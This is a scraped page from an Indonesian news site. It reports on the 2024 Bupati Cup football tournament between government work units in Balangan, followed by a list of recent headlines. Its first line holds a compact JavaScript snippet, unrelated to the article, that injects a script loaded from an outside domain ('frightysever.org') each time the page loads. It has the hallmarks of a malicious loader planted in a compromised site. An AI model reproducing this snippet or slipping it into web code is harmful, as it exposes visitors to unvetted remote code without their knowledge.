(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

18 Tim Ramaikan Turnamen Sepakbola Bupati Cup 2024


KANALKALIMANTAN.COM, PARINGIN – Ajang keakraban antar unit kerja sekaligus saling silaturrahmi, Pemerintah Kabupaten (Pemkab) Balangan menggelar turnamen sepakbola Bupati Cup 2024 antar SKPD dan instansi vertikal, di Stadion Marthasura Paringin, 13-26 Juni 2024.

Sebelum resmi dibuka, Kamis (13/6/2024) sore, digelar pertandingan persahabatan antara Old Star Balangan U-40 melawan Old Star Tanjung U-40. Skor akhir 2-0 untuk kemenangan Old Star Tanjung U-40.

Staf Ahli Bidang Kemasyarakatan dan Sumber Daya Manusia Kabupaten Balangan, Hasmiati mewakili Bupati Balangan saat sambutan menyampaikan penghargaan kepada panitia penyelenggara atas inisiatif menyelenggarakan event sepakbola antar SKPD dan instansi vertikal di Kabupaten Balangan.

Hasmiati melanjutkan, turnamen ini memang bukan ajang pencapaian prestasi olahraga, melainkan lebih sebagai pertandingan keakraban antar unit kerja.

Baca uga: DWP HSU Turut Galakkan Literasi di Lingkungan Keluarga

“Tim yang berlaga bukan terdiri dari pemain-pemain profesional, melaikan kawan-kawan seprofesi atau sehari-hari saling terhubung oleh rutinitas kerja,” katanya.

Oleh karena itu, semua berharap agar rangkaian pertandingan mampu menjalankan fungsi rekreasi dan refreshing bagi semua di tengah rutinitas kerja.

Satu fungsi lain yang tidak kalah penting dari turnamen ini, adalah fungsi silaturahmi. “Wadah yang sangat baik bagi kita semua untuk saling bersilaturahmi dan mempererat hubungan antar lembaga, sebagai sesama instansi atau SKPD yang sama-sama memiliki tanggung jawab untuk mengabdi kepada masyarakat,” katanya.

Sementara itu, Ketua Panitia Pelaksana Turnamen Sepakbola Bupati Cup 2024, Kurnadi mengatakan, ajang ini berlangsung dari tanggal 13 sampai 26 Juni 2024, menggunakan sistem gugur yang diikuti 18 tim, terdiri dari 14 SKPD dan 4 tim dari instansi vertikal.

“Bagi tim yang bertanding agar menjunjung sportivitas, dan diharapkan ajang bisa kembali digelar,” harapnya. (Kanalkalimantan.com/mcbalangan)

Reporter: mcbalangan
Editor: kk


Risa

Recent Posts

Hari Kesehatan Sedunia 2025: Awal yang Sehat, Masa Depan Penuh Harapan

KANALKALIMANTAN.COM - Hari Kesehatan Sedunia yang dirayakan pada 7 April 2025 memulai kampanye sepanjang tahun… Read More

1 jam ago

Dua Hari Kunjungan Khusus di Lapas Banjarbaru saat Momen Lebaran

KANALKALIMANTAN.COM, BANJARBARU - Libur Lebaran Idulfitri menjadi momen spesial satu tahun sekali yang dilaksanakan oleh… Read More

23 jam ago

Ada Peristiwa Tertinggal saat Rekontruksi Pembunuhan Juwita, Begini Kata Tim Kuasa Hukum

KANALKALIMANTAN.COM, BANJARBARU - Reka adegan atau rekontruksi pembunuhan berencana yang dilakukan Jumran, anggota TNI AL… Read More

2 hari ago

Hadapi Porprov XII Kalsel, PBSI Balangan Gelar Seleksi Atlet

KANALKALIMANTAN.COM, PARINGIN - Pengurus Kabupaten (Pengkab) Persatuan Bulutangkis Seluruh Indonesia (PBSI) Balangan menggelar seleksi atlet… Read More

2 hari ago

Reka Adegan Jumran Habisi Juwita, Dipiting Lalu Dicekik

KANALKALIMANTAN.COM, BANJARBARU - Jumran melakukan reka adegan pembunuhan berencana yang dilakukan kepada Juwita, seorang jurnalis… Read More

2 hari ago

Dinsos Kalsel Salurkan Bantuan Banjir di Desa Pondok Babaris, Ini Kata Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Sinergisitas antara Pemerintah Kabupaten Hulu Sungai Utara dengan Pemerintah Provinsi Kalimantan Selatan… Read More

2 hari ago

This website uses cookies.